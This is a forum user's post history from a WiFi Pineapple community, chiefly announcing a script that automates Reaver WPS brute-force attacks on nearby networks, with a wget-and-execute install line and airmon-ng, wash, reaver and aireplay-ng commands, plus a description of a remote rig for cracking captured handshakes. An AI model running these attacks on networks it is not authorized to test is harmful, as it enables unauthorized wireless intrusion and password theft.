Jump to content

airman_dopey

Active Members
 View Profile  See their activity

  • Posts

    158

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Posts posted by airman_dopey

    Launch Reaver from WPS button

    in WiFi Pineapple Mark IV

    Posted · Edited by airman_dopey

    Updated to version 1.1. Change log is as follows:

    - Fixed bug where installing to USB would fail
- Added Aireplay-ng and Reaver monitoring. This allows the script to ensure everything is running properly and, if either program fails, causes the script to relaunch the suspect program up to the threshold set in the beginning of the script (currently set to 3)
- Added signal checking to discard network if signal strength is below -81 as shown by Wash
- Added flag to bypass minimum signal strength check
- Added output flag to send a copy of all output to file
- Added ability to have second press of WPS button close script gracefully (This function requires the WPS button script to be rewritten by running the install portion of the script).
- Added steadily blinking light to signify script is waiting "N" seconds prior to starting attack
- Added sanity checks to verify Reaver and Aireplay-ng are installed prior to running
- Fixed numerous bugs relating to the overall function of the script

    If you are upgrading from an older version please make sure you run the install again and overwrite the WPS button script to add the button-cancel function of the script

    Thank you all who have tried this script. I hope it is useful.

    USB Power Cable Not Enough for USB (SanDisk)

    in WiFi Pineapple Mark IV

    Posted

    In response to the above post, has anyone purchased a more powerful juice battery pack and had success with powering the USB drive?

    A friend of mine bought the Anker3 and powers the pineapple, powered hub with a USB drive and Alfa NHA card, and a RasPI, and gets approx. 13 hours running off that setup. So yeah, it'll power the USB drive

    Launch Reaver from WPS button

    in WiFi Pineapple Mark IV

    Posted · Edited by airman_dopey

    EDIT 2: Version 1.2 of the script has been release. See post 16 for changes

    EDIT: Version 1.1 of the script has been release. See 3rd post for changes

    Hope this is the right section.

    Hey guys. I was researching Reaver attacks straight from the pineapple and I could not find anything I liked. I wanted something completely automated from the WPS button. Since I couldn't find one I wrote one and thought I'd share.

    This script attempts a WPS attack utilizing Reaver and the wifi pineapple

Usage: ./reaver.sh [-b BSSID] [-d] [-e ESSID] [-f] [-h] [-i location]
           [-w time] [-o file] [-s]

    -b BSSID    When scanning for networks this BSSID will be attacked
                regardless of both signal strength and if it was
                cracked before. (Note: When scanning networks if both
                ESSID and BSSID are listed the BSSID is used first)

    -d          Debug mode: Prints extra information to
                help with debugging

    -e ESSID    When scanning for networks this ESSID will be attacked
                regardless of both signal strength and if it was
                cracked before. (Note: When scanning networks if both
                ESSID and BSSID are listed the BSSID is used first)

    -f          Force attack of closest network
                (override check of previously cracked networks)

    -h          This screen

    -i          Installs Reaver (if missing) and offers
                to integrate with WPS button.
                (Requires internet connection)

    -o file     Sends copy of all output to file

    -s          Overrides the minimum signal strength required

    -w delay    wait "N" seconds before beginning attack

    (The help screen of the script)

    Basically here's how the script runs: Once you push the WPS button, It will start with phase 1 and blink the light once. During this phase karma will be stopped and the wireless card will be prepped for the attack.

    Once this is complete the WPS light will blink twice and phase 2 will start. This is where the pineapple will start scanning for networks using wash. First thing that happens is it checks the self-created "cracked.txt" for previously cracked networks and omits them from the scan (unless the -f argument is used). It then checks all the networks seen and, if an ESSID or BSSID was requested it will use that network if visible. If not seen it will attack the network with the strongest signal.

    Once the network is determined it will switch to phase 3 and the WPS light will blink 3 times. This is where the actual attack starts. Aireplay-ng will attempt to associate with the network and, if successful, Reaver will begin. Once Reaver completes the WPS light will light back up and the network will be saved in the cracked.txt file.

    If any errors happen throughout the script it will stall out and the WPS light will start flashing off and on. I have really tried to capture all possible errors, but since I cannot foresee all problems if you run into any problems please let me know and I will modify my script.

    Installation is extremely simple. Just SSH into your pineapple, and while in the "/root" directory (which is the default directory when you SSH in) run ONE of the following commands to install the script:

    To install Reaver:

    wget http://hax0rbl0x.googlecode.com/files/reaver.sh; chmod +x reaver.sh; ./reaver.sh -i

    Once that is installed, follow the post-installation instruction, or if you selected to modify the WPS button functionality, simply press the WPS button.

    I have tested this using just the Pineapple holiday bundle and it works like a charm. Not only that, but simply using the pineapple juice for power the pineapple was still going 14 hours later. I guess karma really eats up the battery. So just the pineapple juice should be sufficient for any attacks you are trying to accomplish. If for some reason you run out of juice prior to Reaver finishing the attack it will pick up where it left off.

    Hope you guys like it. Enjoy.

    USB Power Cable Not Enough for USB (SanDisk)

    in WiFi Pineapple Mark IV

    Posted

    Same issue. Also does not work when using the pineapple juice (which really frustrated me). I feel for you. Very frustrating when you purchasing things from a store expecting them to work with one another and no mention through the store that they do not. The hakshop still doesn't say anything about this issue and it has been reported numerous times in the forums. The lack of communication (or lack of caring, but I am attempting to give the benefit of the doubt) is atrocious.

    Reaver

    in Mark IV Infusions

    Posted

    Output of wash is as follows:

    BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------
XX:XX:XX:XX:XX:XX    11       -52   1.0          No          XXXX

    This is while sitting in the same room as the AP using the alfa panel 7db antenna.

    So I may have made a small error. When I tried to run aireplay to generate traffic it kept erroring out with a WPA error. But it seems to be case sensitive. When I did my ESSID exactly as listed it was showing as connected. When I tried running reaver in a seperate terminal it started cracking. I will edit this post after a successful test with all the commands I used in order, but it seems to be working now. Thank you for all your help.

    Reaver

    in Mark IV Infusions

    Posted · Edited by airman_dopey

    I prefer using reaver and wash from terminal. I have had better luck this way.

    The commands I use are:

    airmon-ng start wlan0

    ifconfig wlan0 down

    wash -i mon0

    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -a -c XX -vv

    If you don't know what wash does, it displays only WPS enabled access points.

    Hope this helps.

    -SymPak

    Thank you for your response. I tried following your commands and get the same thing. When I leave wlan0 up the "failed to associate" messages appear approx. once every 10-12 seconds. With having wlan0 down and only mon0 up the failed messages spam every second. With that being said, wash displays the proper APs in my area properly.

    I think I am going to attempt to reflash my pineapple and start over and see if that makes a difference.

    *EDIT* Reflashed, did an opkg update, opkg install reaver, and then ran the commands listed above, same thing. Tried bringing wlan0 back up, no change (other than the time between error messages again).

    *EDIT 2* Tried on a seperate AP and same result.

    Reaver

    in Mark IV Infusions

    Posted · Edited by airman_dopey

    Has anyone else worked out the "failed to associate" issue with Reaver? I have tried the following:

    Firmware at 2.8.1 stable

    Installed the reaver 0.4 module

    ~In Module~

    Stopped wlan0

    started wlan0

    started mon0

    scanned for APs

    selected my AP (WPS enabled, good signal)

    Selected auto detect and set channel choices

    Started attack

    At this point I get the failed to associate message. So I switched to the CLI via SSH.

    ~CLI~

    ifconfig wlan0 down

    airmon-ng start wlan0

    ifconfig wlan0 up

    ifconfig mon0 down

    ifconfig mon0 up

    reaver -i mon0 -b XX:XX:XX:XX:XX:XX -a -c 11 -vv

    and I get failed to associate. So I tried using aireplay-ng

    ~CLI~

    aireplay -1 5 (or 120) -a XX:XX:XX:XX:XX:XX -e ESSID mon0

    comes back with "could not determine channel". Tried setting channel by dropping wlan0 and changing it using "iw wlan0 set channel 11" and still nothing. Tried doing the same for mon0 but regardless of the interface being up or down the interface states that it is busy when I try to change the channel of mon0.

    At this point I am completely out of ideas. Any ideas?

    *edit* I have also tried using the exact same reaver command on my Kali build running side by side and the reaver attack through Kali works fine. So I know my AP is not immune to the attack

    Reverse Defrag

    in Questions

    Posted

    Seeing as this would be used for strictly malicious purposes expect a warning at the very least from the mods. This is a security integrity community, not a group of petty vandals.

    Should I Upgrade The Antenna?

    in Hacks & Mods

    Posted

    What's the best antenna for the pineapple

    Iam tying to find one with 3 to 4 mile range

    Open terrain? City? Through buildings? omni or uni directional?

    There is no "best antenna" and I doubt you're going to get your 3-4 mile range unless you have a very specific scenario in mind.

    Post my gear

    in Hacks & Mods

    Posted · Edited by airman_dopey

    Thought I would post my gear as well.

    IMG_20130228_151218.jpg

    -Laptop is an Acer Aspire, nothing fancy, but it has an Atheros chipset for wireless

    -Pineapple with the travel pack (pineapple juice and case)

    -A couple of 5db rubber duckie antennas

    -a 7db Alfa panel antenna

    -9db antenna found in the HakShop

    -14.3db yagi cantenna with the vanguard tripod

    -LAN wiretap

    -Alfa 036H NIC

    -Squid hub and misc. dongles/hubs/flash drives etc

    Something else I cannot easily take pictures of (but can screenshot) is my server that's on 24/7. I host files through it to the house and thought about making it a "cracking rig". So I threw an old GTX285 in it and beefed up the power supply. With that I added GPU cracking to it and wrote some scripts to automate my dictionary/brute force attacks.

    Transfer.jpg

    A simple script on my laptop allows me to check the pcap file and sftp it to my home rig (using dynamic DNS).

    Crack_Menu.png

    Once the file transfers to my server I SSH in and load the main menu script. You can see some of the things I have added already.

    Config.png

    This is the configuration menu where I can pick which wordlists to use. I have over 33 gigs of wordlists stored on the machine. Additionally, I can spawn the processes into the background and let them run by themselves. For notifications I have my rig programmed to text me with status messages (wordlist started, finished, password found/not found). THis way I can be in the field and, once capturing a handshake, forward it on to my rig and go eat some lunch or something while my machine back home does all the heavy lifting. Once the machine finds the info, I receive a text on my phone that looks like this:

    Screenshot_2013-02-28-15-08-51.png

    It's not pretty ATM, but it is extremely functional. I'm looking to add hash cracking and similar tools to it. No point in using my feeble laptop for cracking when I can let full blown desktops do it much much faster.

    Should I Upgrade The Antenna?

    in Hacks & Mods

    Posted

    Link 1: Yes, a higher gain antenna will give you further range, but keep in mind that an omni directional antenna has a donut-shaped range. The higher the gain, the flatter the donut (to the point that even a couple feet higher than the antenna will cause you to have no signal). I am not a radio professional, so I cannot say how the 12db antenna will perform, but I have a 9db one from the hakshop and it works very well.

    As for the second link, yes, that is the one

×
×
  • Create New...